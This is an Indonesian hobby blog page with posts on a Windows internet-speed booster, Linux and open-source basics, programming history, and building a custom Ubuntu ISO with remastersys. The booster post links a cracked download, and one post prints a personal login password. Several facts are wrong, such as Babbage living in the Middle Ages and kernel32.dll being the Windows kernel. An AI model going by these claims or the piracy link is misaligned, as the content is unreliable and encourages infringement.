PERCEPAT KONEKSI INTERNET DENGAN FULLSPEEDV 3.3

19 comments
Bagi sahabat BLOGGER yang gila internet, hehe bisa di bilang ‘Penjelajah Internet Sejati’ pasti mendambakan koneksi internet yang cepat, sehingga kita dapat membuka halaman web dengan lancar dan mendownload data-data yang kita perlukan di dunia maya. Bayangkan saja, kalau kita berhadapan dengan koneksi yang lelet, padahal kita harus segera menyelesaikan pekerjaan dan apa yang kita butuhkan sebenernya sudah tersedia di internet, pasti Muuuuangkeeeeeeel. Apalagi kalau kita hobi ngeblog, dengan adanya koneksi yang lancar dan cepat akan memudahkan kita dalam mengupdate data.hehe

Nah, ini ada satu lagi software berbasis Windows yang bisa membantu kita dalam menjelajahi dunia internet, namanya Full Speed dari Versis. Full Speed akan membantu mempercepat koneksi internet yang sedang kita gunakan, baik itu koneksi dial up atau broadband.

Bagaimana Full Speed mempercepat koneksi internet?

Secara konsep “Full Speed” akan melakukan konfigurasi ulang pada sistem windows yang kita gunakan sehingga koneksi internet yang ada bisa lebih optimal dan memaksimalkan transfer data baik dalam sebuah jaringan ataupun transfer data internet, karena kemampuan transfer data di internet semakin lama semakin bertambah cepat, tapi karena keterbatasan Windows yang sudah lama kita gunakan, maka kecepatan data yang meningkat tersebut tidak dapat diterima secara maksimal oleh Windows, bahkan Windows Vista sekalipun (berdasar rumor Windows Vista malah menjadi produk gagal dari Windows). Di sinilah fungsi dari software Full Speed ini, yang akan memperbaiki konfigurasi pada Windows dengan mudah, tanpa harus kita mengubah registri atau konfigurasi lainnya yang cukup rumit, serahkan saja pada Full Speed untuk menyelesaikan. Oh, iya software ini walaupun untuk Windows, tapi bukan berarti hanya berfungsi untuk IE (Internet Explorer) saja, tapi juga bisa memaksimalkan Firefox.
Penggunaan aplikasi ini cukup mudah, setelah kita download, jalankan aplikasi ini. Hal pertama yang kita lakukan adalah melakukan pengujian kecepatan pada koneksi internet yang sedang kita pakai.

Pada panel Full Speed akan ada 2 pilihan, untuk pengguna IE dan Firefox, pilih sesuai dengan browser yang biasa kita pakai. (sebagai contoh di sini saya pilih Firefox)

Klik tombol Web Speed Test, dan tunggu beberapa saat, hingga Full Speed selesai melakukan pengujian koneksi, dan menampilkan hasil pengujian berupa waktu yang dibutuhkan dalam membuka satu halaman web. (ingat-ingat waktu yang dibutuhkan, karena nanti akan kita bandingkan dengan setelah proses optimalisasi selesai dilakukan)

Pilih Ok, dan Ok lagi untuk kembali masuk ke panel Full Speed dan melakukan proses optimalisasi koneksi internet.

Sekarang akan aktif 3 tombol baru, Apply Full Speed Boost, Original Windows Setting, dan Pro Boost. Untuk meningkatkan performa windows dan browser yang kita pakai, silakan klik Apply Full Speed Boost, jangan lupa jika kita menggunakan koneksi dial up, maka centang juga pilihan I only have a standard Dial-Up modem.
Jika menggunakan koneksi broadband, maka kita bisa memilih Pro Boost.
Sedangkan untuk mengembalikan parameter seperti standar windows, silakan pilih Original Windows Setting.
Setelah kita pilih Apply Full Speed Boost, tunggu beberapa saat.

Di sini kita bisa melakukan pengujian kecepatan kembali dengan memilih Show My Speed Improvements Now!, kemudian kita pilih kembali sesuai browser yang kita pakai, dan lihat hasil pengujiannya, bandingkan waktu yang dibutuhkan untuk membuka halaman web.(disarankan untuk merestart Windows terlebih dahulu untuk mendapatkan hasil yang optimal).
SELAMAT MENCOBA.....
Mudah kan prosesnya, jika tertarik untuk mencoba Full Speed, dapat mendownload DISINI FREE FULL CRACK

Ilmu ini aku peroleh dari tempatku Prakerin..hehhe ni dia Blog-nya..klik
READ MORE - PERCEPAT KONEKSI INTERNET DENGAN FULLSPEEDV 3.3

Distribusi Linux

13 comments
Untuk memudahkan kepada para pemakai Linux, telah banyak berdiri perusahaan software yang mengemas software-software dari GNU untuk membuat Distribusi Linux. Untuk ini kita mengenal Slackware, Redhat, Linux Mandrake, Debian GNU/Linux, SuSE, Corel Linux, Trustix Merdeka dan masih banyak lagi.Masing-masing distribusi Linux memiliki target pasar sendiri-sendiri, mereka juga berusaha untuk semakin memudahkan user, dari masalah instalasi, penggunaan, dan perawatan.Tetapi pada dasarnya mereka mengambil dari sumber yang sama.

Setiap distribusi Linux biasanya dijual dengan harga tertentu, apa yang mereka jual sebenarnya bukan softwarenya, tetapi usaha untuk mengemasnya, baik fisik maupun softwarenya. Setiap distribusi Linux biasanya juga menyediakan versi yang berlisensi GPL, untuk ini biasanya kita harus mendownload.

Dalam distribusi Linux umumnya telah lengkap software-software yang ada di dalamnya. Meliputi untuk fungsi-fungsi server dan desktop. Sebagai contoh distribusi Linux Mandrake 8.2 di dalamnya telah terdapat aplikasi untuk GUI (Gnome, KDE), aplikasi office (Gnome office, Koffice), PIM (Evolution), Database server (MySQL, PostgreSQL), Web server (Apache), Web scripting (PHP, Perl), Software development tools (Make, GCC, Perl, Python,Ada LISP, Glade, KDevelop, QtDesigner), Aplikasi web (PHP Groupware, PHPNuke) dan ratusan aplikasi lain yang dikemas dalam 3 CD.

NB: "Dalam distribusi Linux telah berisi software-software lengkap, dari software aplikasi perkantoran, pemrograman, hingga software untuk server".
READ MORE - Distribusi Linux

Networking Dapat Award

6 comments
Mengucap syukur alhamdulillah adalah hal yang pertama saya lakukan setelah melihat pesan di Cbox saya. Ternyata salah seorang temen blog saya telah memberikan sebuah award kepada saya. Nama temen saya itu Uchu. Saya sangat berterima kasih kepada Sob Uchu yang telah memberikan award kepada saya, rasanya kayak abis dapat rejeki nomplok..




Hmmm...... Karena aturan mainnya adalah harus membagikan award ini kepada teman kita, maka saya memberikan award ini kepada temen2 saya:

READ MORE - Networking Dapat Award

10 Alasan Kenapa Linux Adalah Sistem Operasi Terbaik

34 comments
Dalam post sebelumnya saya telah menulis tentang definisi tentang Linux, maka kali ini saya akan memberikan alasan "Kenapa sih kita harus memilih Linux?".

Dan jawabannya seperti di bawah ini:
  1. Di dalam distribusi Linux terdapat software-software berharga jutaan rupiah yang gratis atau beberapa ribu rupiah untuk kemasan CD-nya.
  2.  Sistem operasi yang lengkap :
    • Stabil --> aplikasi yang crash tidak menyebabkan sistem operasi Down.
    • Reliable --> Server Linux sudah biasa hidup dalam jangka waktu RATUSAN hari, di     banding  Windows yang perlu di Reboot secara berkala.
    • Secara ekstrim sangat bermanfaat.
  3.  Dilengkapi dengan puluhan lingkungan pengembangan aplikasi, termasuk C, C++, Fortran, Ada toolkit seperti Qt dan beberapa bahasa script semacam Perl, Python, Awk, dan sed. Kompiler C pada Windows harganya lebih dari $1000 AS.
  4.  Fasilitas jaringan yang istimewah, memungkinkan untuk berbagi CPU.
  5.  Lingkungan yang ideal untuk menjalankan server, seperti Web Server, FTP Server, Authentication Server dan sebagainya.
  6. Tersedia pula software komersial, jika kebutuhan tidak terpenuhi dengan software yang gratis.
  7. Sistem operasi yang mudah untuk di-upgrade.
  8.  Mendukung banyak prosesor sebagai standart.
  9.  Multi-Tasking yang nyata, memungkinkan untuk menjalankan lebih dari satu program pada waktu yang sama.
  10. Sistem GUI (windows) yang disebut X yang istimewah, ekivalen dengan Windows namun sangat mudah untuk dikasteminasi.
Jadi apa salahnya kalau kita mencoba untuk migrasi ke Linux. ^_^
READ MORE - 10 Alasan Kenapa Linux Adalah Sistem Operasi Terbaik

Definisi Linux

11 comments
Sebelum kita membahas lebih jauh tentang Linux, kita harus tahu apa sih sebenarnya definisi dari Linux??

Maka dalam kesempatan kali ini saya akan memberikan sedikit informasi tentang definisi dari Linux.

Apa itu Linux??

Linux adalah sistem operasi bertipe Unix yang awalnya dibuat oleh Linuz Trovalds dengan bantuan dari pengembang software se-penjuru  dunia. Linux adalah implementasi POSIX secara mandiri dan termasuk multitasking secara nyata, virtual memori, shared library, demand loading, dan penanganan memori yang baik, jaringan TCP/IP, dan penampilan lain yang konsisten dengan lisensi GNU General Public License, sehingga kode sumber bebas untuk semua orang.

Cukup sekian informasi yang dapat saya berikan, dan semoga bermanfaat bagi kita semua. GO Open Source.
READ MORE - Definisi Linux

Pengertian Open Source

14 comments
Konsep Open Source ini sedah ada sejak tahun 1984, yaitu dengan adanya GNU Project yang di sponsori oleh Free Software Foundation (FSF). GNU Project bertujuan untuk menyediakan sistem operasi seperti Unix yang "free" : GNU system. Free dalam arti kebebasan bukan dalam konteks harga.

Free software dalam arti kebebasan user untuk menjalankan , mentalin, mengedarkan, mempelajari, mengubah software untuk memperbaiki. Varian dari sistem operasi GNU adalah penggunaan yang luas dari Linux sebagai kernel. Sistem ini secara singkatnya disebut Linux, dan nama yang lebih lengkapnya adalah GNU/Linux System. Ada banyak software yang kemudian masuk dalam GNU Sofrware Directory.

Software-software dari GNU ini umumnya berlisensi GNU GPL (GNU Public License). Lisensi GNU GPL ini memberikan keleluasaan kepada siapapun untukmenggunakan , mendistribusikan, mempelajari, dan merubah kode sumber. Lisensi ini juga memungkinkan kepada siapapun untuk mengambil sebagian atau seluruh dari kode sumber untuk digunakan dalam software lainnya.

Software dari hasil modifikasi tersebut juga boleh untuk dijual dengan syarat lisensi dari software tersebut tetap harus GNU GPL. Ini menunjukkan bahwa lisensi ini melarang seseorang untuk memperoleh hak patent untuk pribadi atas software yang di buat dengan lisensi GPL.

NB : "GNU Project : Menyediakan sistem operasi seperi Unix yang "free". Free dalam arti kebebasan, BUKAN dalam konteks harga."

Semoga informasi yang saya berikan bermanfaat bagi temen2 semua..^_^.
READ MORE - Pengertian Open Source

Sejarah Bahasa Pemrograman

26 comments
Penemuan bahasa pemrograman belumlah lama berselang Kemunculannya di mulai bersamaan dengan kemunculan komputer itu sendiri. Bahasa pemrograman dan komputer merupakan dwitunggal yang tidak terpisahkan karena sebuah komputer hanya bisa berfungsi jika ada program.
Sementara itu, sebuah program yang dibuat dengan bahasa pemrograman hanya  bisa hidup dengan menggunakan komputer sebagai media.

Bahasa pemrograman telah mengalami berbagai proses perkembangan. Kondisi bahasa pemrograman saat ini telah berbeda jauh dengan bahasa pemrograman di tahun 40-an. Dahulu progammer memrintah komputer secara fisik menggunakan metode pengkabelan / wiring secara manual.

Metode wiring kemudian berkembang hingga menjadi bahan pemrograman sederhana. Kualitas dan fitur berkembang dan bertambah dengan pesat. Bahasa pemrograman di awal kemunculannya hanya dapat digunakan untuk satu keperluan saja/ one purpose only, tetapi kini dapat digunakan untuk bermacam-macam keperluaan. Mungkin pada tahun-tahun mendatang akan berkembang dengan lebih natural dan semakin mudah dipahami manusia.

Tokoh pertama yang di anggap memperkenalkan bahasa pemrograman pada komputer adalah Charles Babbage. Charles Babbage adalah seorang ilmuwan yang hidup di Inggris pada abad pertengahan. Beliau adalah orang yang pertama kali mendesain mesin menyerupai komputer. Mesin tersebut diisi beberapa program yang dapat berjalan di dalamnya  (identik seperi bahasa assembly sekarang ini). Pembuat program tersebut adalah Byron Countess of Lovelace, putri dari Lord Byron.

Komputer modern yang menggunakan tenaga listrik pertama kali diciptakan pada tahun 1940-an. Ketika itu, komputer masih menjadi barang mewah dan hanya dimiliki oleh pihak-pihak yang memerlukan perhitungan data yang sangat banyak, seperti pihak militer dan universitas. Komputer pada waktu itu berukuran sangat besar sehingga memakan banyak tempat.
Meskipun besar, komputer dianggap lambat menjalankan proses komputasi. Di awal penciptaannya hanya sedikit tokoh yang menyarankan untuk membuat program pada komputer.
Salah satu tokoh yang mengeluakan isu perlunya dibanun software pada komputer adalah Konrad Zuse.

Dunia pemrograman kemudian mengalami perkembangan yang sangat pesat setelah ditemukan komponen-komponen elektronika. Penggunaan komponen elektromika menyebabkan komputer menjadi komputer berukuran kecil karena ditemukannya teknologi Integrated Circuit (IC) dan teknologi pembuatan chip lainnya. Selain ukuran yang mengecil, kelebihan komputer setelah revolusi elektronika terdapat pada kemampuan komputasinya yang meningkat tajam. Oleh karena itu kemampuannya meningkat, secara otomatis komputer mampu menangani pemrosesan algoritma dangan lebih cepat. Hal tersebut mendorong di buatnya berbagai macam bahasa pemrograman tingkat tinggi.

Bahasa pemrograman tingkat tinggi yang pertama muncul adalah Fortran yang dibuat oleh tim dari IBM yang diketahui oleh John W Backus. Fortran saat ini masih banyak digunakan untuk membuat sofrware yang mampu menaangani perhitungan numerik. Fortran terakhir yang baru dikeluarkan adalah Fortran 2004.

Dunia bahasa pemrograman kembali ber-revolusi ketika Dennis Ritchie dan Brian Kernighan mengembangkan bahasa pemrograman C. Bahasa pemrograman C pada awalnya dibuat untuk mesin DEC PDP-11. Bahasa tersebut kemudian dikembangkan oleh Bjarne Stroustrup hingga menjadi C++ di tahun 1985 sebagai bahasa pemrograman berorientasi objek yang sangat kompatibel dengan C. Selanjutnya, Sun Microcyctem mengeluarkan bahasa pemrograman Java di tahun 1995 yang kemudian menjadi terkenal karena diajarkan di berbagi universitas. Microsoft kemudian mengeluarkan bahasa C# dalam paket dotNET project. Bahasa pemrograman C# hampir mirip dengan C++ dan Java.

Begitulah sejarah dari bahasa pemrograman yang ada sekarang ini..Semoga bermanfaat untuk kita semua.
READ MORE - Sejarah Bahasa Pemrograman

Pengertian Bahasa Pemrograman

8 comments
Bahasa pemrograman adalah istilah yang menerangkan bahasa yang dapat dimengeri oleh komputer. Dalam dunia komputerm dikenal 2 jenis bahasa pemrograman, yaitu bahasa pemrograman tingkat tinggi dan bahasa pemrograman tingkat rendah.

Sebuah bahasa pemrograman atau bahasa komputer di artikan sebagai teknik komunikasi yang terstandarisasi untuk menyatakan instruksi kepada komputer. Bahasa pemrograman adalah kesatuan aturan sintaksis dan semantik yang di gunakan untuk mendefinisikan program.
Sebuah bahasa pemrograman memungkinkan programer untuk menentukan secara tepat apa yang harus dilakukan oleh komputer, cara mengatur transfer data, input-output, dan kegiatan-kegiatan yang harus dilakukan dalam berbagai keadaan.

Bahasa pemrograman tingkat rendah merupakan bahasa pemrograman yang sulit dimengerti oleh manusia, sedangkan bahasa pemrograman tingkat tinggi lebih mudah dipahami oleh manusia. Contoh dari bahasa pemrograman tingkat rendah adalah Assembly, dan contoh bahasa pemrograman tingkat tinggi adalah C dan Pascal.

Perkembangan teknologi yang sangat cepat menghasilkan berbagai macam kebutuhan komputasi yang beraneka ragam. Oleh karena itu, muncul berbagai bahasa pemrograman yang berguna untuk memecahkan berbagai macam masalah dengan bantuan komputer.
Tiap-tiap bahasa pemrograman pada umumnya diciptakan untuk kondisi yang berbeda-beda. Tidak ada satu bahasa pemrograman pun yang bisa dikatakan unggulsecara mutlak, sebab bahasa-bahasa tersebut diciptakan dengan asumsi-asumsi tertentu dan berjalan di atas sistem operasi atau persyaratan tertentu.

Semoga Info yang saya berikan bisa bermanfaat bagi temen-temen blogger semua -_-.
READ MORE - Pengertian Bahasa Pemrograman

Perbedaan Antara Program GUI dan CUI

20 comments
Dari sisi cara penampilannya, sebuah program dapat di bedakan menjadi dua, yaitu Graphical User Interface (GUI) dan Command User Interface (CUI).

Program GUI merupakan program yang berjalan di atas Graphical User Interface atau dengan kata lain merupakan  program yang di buat dengan bahasa pemrograman.

Untuk membuat program GUI, anda dapat menggunakan  bahasa pemrograman visual seperti Visual Studio.Net dan Delphi di Windows atau KDevelop plus QT Designer di Linux.

Bahasa pemrograman Web seperti HTML juga termasuk kelas pemrograman GUI karena pada umumnya di buka menggunakan browser berbasis GUI, walaupun bisa di buat memakai browser teks semacam Lynx.

Sementara itu, program CUI adalah program yang berjalan dengan mode tampilan konsol. CUI program yang akan anda buat kebanyakan disusun oleh tampilan teks (walaupun anda dapat membuat efek sehingga terlihat tampilan seperti visual).

Untuk membuat program CUI, anda dapat menggunakan bahasa pemrograman berbasis konsol seperti Pascal, C , Perl, Phyton, dan lainnya.

Jadi sekarang anda tau perbedaan tentang Program Graphical User Interface (GUI) dan Command User Interface (CUI).
READ MORE - Perbedaan Antara Program GUI dan CUI

Linux Memasuki Industri Otomotif

6 comments
Linux saat ini sudah hadir dimana-mana. Setelah menguasai kira-kira lebih dari setengah jumlah server seluruh dunia, kemudian merambah ke ponsel, PDA, bahkan iPod, dan saat ini memasang targetnya terhadap industri otomotif.

Dengan mengingkatnya biaya komponen-komponen elektronik dalam otomotif, maka menciptakan persaingan di antara Linux dan sistem operasi proprietary. MontaVista Software, yang berbasis di Sunnyvale, California, merupakan salah satu dari sejumlah perusahaan software yang menyediakan software berbasis Linux untuk aplikasi-aplikasi device khusus di bidang automobile.

Industri otomotif memilih Linux dikarenakan Linux menawarkan netralitas terhadap vendor, biaya yang rendah dan waktu yang cepat menuju pasar, demikian menurut Glenn Seiler, Direktur Product Marketing, MontaVista Software.

"Seperti halnya industri lainnya - telekomunikasi, keuangan, kesehatan, dan lain?lain - penyedia otomotif harusnya akan memajukan solusi berbasis Linux agar tetap terjadi kompetisi," tambah Glenn Seiler dalam suatu wawancara dengan LinuxInsider.

"Terdapat lebih banyak pengembang Linux yang tersedia pada pasar dan waktu untuk debug terjadi lebih berkurang," menurut Glenn.
READ MORE - Linux Memasuki Industri Otomotif

Pengertian Modul Kernel Linux

8 comments

Modul kernel Linux adalah bagian dari kernel Linux yang dapat dikompilasi, dipanggil dan dihapus secara terpisah dari bagian kernel lainnya saat dibutuhkan. Modul kernel dapat menambah fungsionalitas kernel tanpa perlu me-reboot sistem. Secara teori tidak ada yang dapat membatasi apa yang dapat dilakukan oleh modul kernel. Kernel modul dapat mengimplementasikan antara lain device driver, sistem berkas, protokol jaringan.
Modul kernel Linux memudahkan pihak lain untuk meningkatkan fungsionalitas kernel tanpa harus membuat sebuah kernel monolitik dan menambahkan fungsi yang mereka butuhkan langsung ke dalam image dari kernel. Selain hal tersebut akan membuat ukuran kernel menjadi lebih besar, kekurangan lainnya adalah mereka harus membangun dan me-reboot kernel setiap saat hendak menambah fungsi baru. Dengan adanya modul maka setiap pihak dapat dengan mudah menulis fungsi-fungsi baru dan bahkan mendistribusikannya sendiri, di luar GPL.
Kernel modul juga memberikan keuntungan lain yaitu membuat sistem Linux dapat dinyalakan dengan kernel standar yang minimal, tanpa tambahan device driver yang ikut dipanggil. Device driver yang dibutuhkan dapat dipanggil kemudian secara eksplisit maupun secara otomatis saat dibutuhkan.
Terdapat tiga komponen untuk menunjang modul kernel Linux. Ketiga komponen tersebut adalah manajemen modul, registrasi driver, dan mekanisme penyelesaian konflik. Berikut akan dibahas ketiga komponen pendukung tersebut.

kernel adalah sebuah aplikasi dari sistem operasi yang tugasnya melayani bermacam program aplikasi untuk mengakses perangkat keras komputer. hal tersebut disebabkan karena akses terhadap perangkat keras yang sangat terbatas sedangkan ada aplikasi yang musti dilayani dalam waktu yang bersamaan, maka disitulah letak tugas kernel mengatur kapan dan berapa lama suatu program atau aplikasi dapat menggunakan suatu perangkat keras tersebut.
READ MORE - Pengertian Modul Kernel Linux

MEMAHAMI DISTRO LINUX

5 comments
Perbedaan Kernell Linux dan Windows

Secara umum kernel itu fungsinya me-manage resource yang ada di komp dan me-manage semua proses. kernel adalah suatu perangkat lunak yang menjadi bagian utama dari sebuah sistem operasi .Tugasnya melayani bermacam program aplikasi untuk mengakses perangkat keras komputer secara aman.
Kernel monolitik mengintegrasikan banyak fungsi di dalam kernel dan menyediakan lapisan abstraksi perangkat keras secara penuh terhadap perangkat keras yang berada di bawah sistem operasi.
Di bawah ini ada beberapa sistem operasi yang menggunakan Monolithic kernel:
Kernel sistem operasi UNIX tradisional, seperti halnya kernel dari sistem operasi UNIX keluarga BSD (NetBSD, BSD/I, FreeBSD, dan lainnya).
Kernel sistem operasi GNU/Linux.
Kernel sistem operasi Windows (versi 1.x hingga 4.x; kecuali Windows NT).
linux :

Open source code kernelnya / kodenya dibuka,Linux memiliki kernel yang stabil. Dia dapat berjalan 24 jam sehari 7 hari seminggu tanpa harus restart. Ini yang membuat Linux menjadi unggul jika dibandingkan dengan MS Windows yang kadang minimal dalam satu hari kita harus me-restart ulang untuk menyegarkannya.
Kernel Linux memiliki interface untuk mengakses sistem, library, dan user interface. Interface untuk sistem berperan penting karena secara umum bertanggung jawab atas proses-proses. Melalui sebuah perintah khusus proses diganti dari mode pengguna ke mode kernel.
Seperti dalam Windows, kernel bekerjasama dengan perangkat I/O dan menangani pengelolaan kapasitas. Bagian yang besar mengurusi manajemen proses, memilih tugas mana yang menjadi prioritas, dan mendapatkan giliran yang mana yang harus dikerjakan. Untuk itu, pada level terbawah terdapat fungsi-fungsi untuk mengendalikan interupsi.
Kernel Linux pada mulanya ditulis sebagai hobi oleh pelajar universitas Finland Linus Torvalds yang belajar di Universitas Helsinki, untuk membuat kernel Minix yang bebas dan dapat sunting. (Minix adalah projek pelajaran menyerupai UNIX direka untuk mudah dan bukannya untuk kegunaan perniagaan.) Versi 0.01 dikeluarkan ke Internet pada September 1991, Versi 0.02 pada 5 Oktober 1991.

windows :
Kernelnya bersifat close source / kodenya ditutup,kernel windows...itu adalah bagian dalam dari sistem operasi windows seperti registry, library nya..kita hanya bisa mengedit sedikit saja tidak bisa dalam seperti nix..makanya disebut sebagai sistem cathedral..tidak seperti opensources

Hal ini bertujuan untuk menjadi yang paling komprehensif kernel1, 2 perbandingan terbaru gaya Unix yang paling populer versus kernel terbaru kernel yang paling populer. Saat ini adalah kernel 2.6.28 Linux dan Windows Vista SP1 kernel. Datang di 2009 adalah 2.6.29 versus Windows Vista SP1.

Pada Windows kernel ditangani oleh file kernel32.dll. Kernel ini menangani manajemen memori operasi masukan / keluaran dan interrupt. Ketika boot Windows, kernel32.dll di-load ke dalam spasi protected memory sehingga spasi memorinya tidak digunakan oleh aplikasi lain. Apabila ada aplikasi yang mencoba mengambil spasi memori kernel32.dll, akan muncul pesan kesalahan "invalid page fault".
GNOME

GNOME - Guh-Nome (GNU Network Object Model Environment) adalah graphical user interface (GUI) & aplikasi desktop untuk sebagian pengguna Unix dan Linux. Ada juga yang di tujukan untuk membuat OS Linux lebih mudah di gunakan untuk non-pemrogram yang pada umum nya terkalit dengan Windows dan kumpulan aplikasi yang menyerupai. GNOME adalah salah satu desktop bagi para pengguna Linux yang memiliki kemudahan memilih aplikasi desktop, dari beberapa tampilan desktop yang tersedia. Dengan GNOME desktop dapat di buat agar terlihat seperti Windows98, Mac OS, atau dengan efect 3D desktop. Gnome juga memiliki kemiripan yang bisa di temukan di Windows Office 97, word processor, a spreadsheet program, database manager, presentation developer, Web browser, dan e-mail program.

GNOME berawal dari upaya dan usaha pengembangan para sukarelawan yang bekerja di bawah naungan Free Software Foundation, sebuah organisasi yang di dirikan oleh richard Stallman. Stallman dan anggota Free Software Foundation meyakini bahwa source code harus selalu publik dan terbuka untuk perubahan sehingga terus dapat di tingkatkan dan dikembangkan oleh orang lain.GNOME sebagai upaya atau alternatif agar pasar aplikasi desktop tidak di pegang oleh 1 vendor.Tujuan GNOME adalah menyediakan sejumlah aplikasi yang mudah dan ramah untuk di gunakan.Selain sebagai desktop, GNOME juga datang untuk pengguna dan kumpulan aplikasi handheld PalmPilot.

KDE
KDE adalah (K Desktop Environment) merupakan salah satu windows manager di sistem operasi berbasis UNIX. Pembuatan aplikasi yang berjalan di KDE harus mengikuti standar antarmuka yang ramah dan efisien bagi penggunanya. KDE adalah sebuah aplikasi desktop environment untuk sistem operasi berbasis UNIX (termasuk Linux, FreeBSD, NetBSD dan lain-lainnya). Fungsinya adalah untuk mengurangi penggunaan command line yang mungkin terlalu rumit bagi pengguna yang awam di sistem operasi berbasis UNIX tersebut, sehingga pengoperasiannya semudah mengoperasikan desktop pada lingkungaN

GNOME VS KDE
KDE dan GNOME merupakan suatu GUI (graphical user interface) atau desktop environtment (lingkungan desktop) yang memudahkan user untuk bisa mengakses aplikasi di linux. Sebenarnya GUI itu tidak hanya KDE dan GNOME saja yang ada, tapi ada juga yang namanya IceWM,XFCE,Blackbox,dan Fluxbox. ringkasnya GUI itu adalah tampilan yang menjembatani penggunaan sistem linux dengan user agar lebih mudah digunakan, jadi usernya tinggal klak-klik aja sana sini.

PERLU diingat bahwa GUI pada linux (yaitu KDE,GNOME dll) berbeda dengan sistem operasi W NDOWS. Kalau di windows, GUInya termasuk sistem utama. AKibatnya ketika GUI pada windows crash, maka sistem utama juga akan ikut crash. Berbeda dg linux, dimana GUInya berjalan di atas sistem X-window. Jadi ketika GUI atau Xwindownya crash, sistem utamanya tidak ikut crash. solusinya cukup restart aja lingkungan X-windownya Dengan kata lain GUI pada linux bukanlah sistem, melainkan aplikasi grafis yang berjalan di atas sistem. Kita anggap saja X-window adalah baju, sedangkan sistem utama adalah orang. KEtika bajunya robek tentu kita tidak perlu menjahit orangnya tetapi bajunya yang kita jahit, atau ganti dg baju yang lain.
Sebenarnya X-window adalah kumpulan bagian yang bekerjasama untuk menampilkan GUI, bagian2 tersebut adalah :
- dasar sistem window, program yang menyediakan layanan untuk sistem X-window
- X network protocol, protokol yang digunakan untuk berkomunikasi lewat jaringan
- Xlib, interface tingkat rendah. Bagian utama yang mengimplementasikan X Netwotk protocol antara sistem jaringan dengan program-program tingkat tinggi
- Window manager, menghubungkan ketiga bagian di atas. WIndow manager adalah aplikasi X yang berfungsi untuk mengatur bagaimana window ditampilkan kepada pengguna..

Remastersys Linux Distro

remastering itu cara untuk menambahkan atau mengurangi aplikasi-aplikasi atau default layanan yang ada di sebuah OS linux. Yang bisa ditambahkan seperti tema, background atau aplikasi-aplikasi software lainnya.

nah ini langkah-langkahnya:
Sedangkan untuk mempermudah pembuatan iso ketika proses remastering
selesai dilakukan, maka digunakan tool yang disebut remastersys. Tool ini
digunakan untuk mengkonversi system operasi yang telah diberi tambahan
aplikasi ke dalam bentuk .iso sehingga nantinya bisa dibuat dalam bentuk
livecd.
Langkah-langkah yang digunakan dalam melakukan remastersys ini
adalah:

1. Melakukan instalisasi system operasi yang akan digunakan, yang
dalam ini adalah linux ubuntu 8.04 dengan menggunakan cd live
ubuntu 8.04. Sudo username:hendy, password:laziale

2. Setelah system operasi terinstal, hal berikutnya yang dilakukan adalah
mencari beberapa aplikasi recovery yang akan ditambahkan ke dalam
system operasi.

3. Kemudian dilakukan penginstallan tool remastersys. Saat
penginstallan remastersys, pada awalnya akan menemui kegagalan
karena dependensi yang dibutuhkan belum tersedia. Untuk itu
dilakukan penginstallan dependensi melalui internet atau melalui dvd
repo.

4. Membuat folder baru di direktori home/hendy yang nantinya akan
digunakan sebagai repository local. Dalam hal ini folder yang dibuat
diberi nama repo_tubes

5. Kemudian memindahkan aplikasi yang telah dibuat ke dalam folder
repo_tubes dan kemudian mengekstrak tiap aplikasi tersebut. Setelah
semua terekstrak maka dilakukan penghapusan terhadap file-file
aplikasi sebelum diekstrak yang masih dalam bentuk
.tar/.tar.gz/.tar.bz2

6. Langkah selanjutnya adalah masuk ke dalam terminal. Setelah masuk
maka hal yang dilakukan adalah mengetikkan perintah (sudo dpkgscanpackages
repo_tubes/dev/null | gzip -9c > repo_tubes/Package.gz)
yang bertujuan unutk mengeset folder repo-tubes menjadi repository local.
7. Setelah itu mengetikkan perintah (sudo gedit /etc/apt/sources.list).
Setelah sources list terbuka, kemudian melakukan pengeditan dengan
menambahkan baris berisi deb file:home/hendy repo_tubes/ .
Setelah itu menyimpannya(save) dan keluar dari sources list.

8. Setelah melakukan pengeditan di dalam source list, hal berikutnya
yang dilakukan adalah mengetikkan perintah (sudo apt-get update)
untuk mengupdate package yang ada dalam repository local

9. Setelah itu hal yang dilakukan adalah melakukan penginstallan
terhadap aplikasi yang diperoleh.
Perintah yang diketikkan adalah (apt-get install nama_aplikasi). Jadi
perintah-perintah yang diketikkan adalah:
‐ Sudo apt-get install ddrescue
‐ Sudo apt-get install foremost
‐ Sudo apt-get install magicrescue
‐ Sudo apt-get install scalpet
‐ Sudo apt-get install testdisk

10. Setelah semua proses penginstallan selesai, maka kemudian hal yang
dilakukan adalah membuka synaptic. Tujuannya untuk
membuang(uninstall) aplikasi-aplikasi yang tidak dibutuhkan untuk
menghemat kapasitas ketika hasil remastering di-burn ke dalam cd.

11. Setelah dirasa cukup, maka kembali ke dalam terminal untuk
melakukan convert ke dalam bentuk iso. Perintah yang diketikkan
adalah (sudo remastersys backup custom.iso)
Hasil remastering dalam bentuk file iso (custom.iso) akan berada di
direktori /home/remastersys.

sebenarnya fungsi remastersys convert ke iso nya saja, dan kalau punya .iso berarti kita punya OS distro bikinan kita sendiri walau hanya nambah-nambahi aplikasi saja...
READ MORE - MEMAHAMI DISTRO LINUX

iTunes Di-hack Khusus untuk User Linux

5 comments
Sebuah grup programer bawah tanah telah memasukkan kode secara online. Menurut mereka, kode tersebut akan membuka pintu belakang dalam toko iTunes milik Apple, sehingga para pengguna komputer Linux dapat mengambil musik dengan bebas dari proteksi copy.

Rilis kode tersebut dikeluarkan sehari setelah Apple memblokir versi sebelumnya dari program tersebut, yang dinamakan PyMusique, pertama dengan memerintahkan semua pelanggan iTunes untuk menggunakan software Apple versi terbaru.

Dalam sebuah kiriman blog, programmer Jon Johansen dari Norwegia, yang sebelumnya bertanggung jawab atas perilisan software yang digunakan untuk menyalin DVD secara online, mengatakan bahwa dia telah berhasil membalikkan enkripsi iTunes yang terbaru.

Cody Brocious, seorang siswa SMA yang bekerja dengan Jon Johansen, mengatakan bahwa mereka melihat proyek mereka sebagai "suatu hal yang perlu bagi komunitas Linux," tanpa melihat dari sisi Apple.

Hasil pekerjaan para programer tersebut menjadi satu dari banyak proyek yang ditargetkan pada Apple, yang memiliki iPod dan iTunes Music Store telah memancing serangan dan eksperimen yang konsisten oleh orang-orang yang terpancing untuk mengembangkan kapabilitas produk atau hanya menghilangkan proteksi copy.
READ MORE - iTunes Di-hack Khusus untuk User Linux

Tool Migrasi Windows Ke Linux Tersedia Gratis

7 comments
